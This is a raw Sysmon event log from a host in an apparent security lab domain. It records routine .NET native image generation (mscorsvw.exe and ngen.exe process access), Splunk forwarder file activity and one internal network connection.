21:06:10.671{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.656{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.656{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.640{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3C89A7A5D3785F0C875D969E444F58,SHA256=0DED57A43847112AC2E077A035B30DA27B189F07B47D995D0EEDFE1A8C6A9068,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.593{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:10.515{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1984-0\System.Management.Instrumentation.dll2021-06-23 21:06:10.515 23542300x800000000000000021811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.468{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F32382012D0FFF26839C3B21A985F10,SHA256=42D06A649C4C23FFA4294DA63C7FE73CC9C509A9AE278C2D9F34E81426812B87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.468{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D0DDF79133C5A17C5FDC364D2EF008A,SHA256=FDBA100414536A0B5255912C320823F840B36FD41982AABEB4B5CB2459F5526F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.359{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.343{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.328{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000021872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.109{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61448-false10.0.1.12-8000- 10341000x800000000000000021871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.937{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:11.921{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.390{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.374{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.296{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.281{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.281{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B004-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:13.218{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\91c-0\System.Runtime.Caching.dll2021-06-23 21:06:13.218 10341000x800000000000000021895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.078{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.062{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:13.062{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-AF04-00000000CF01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
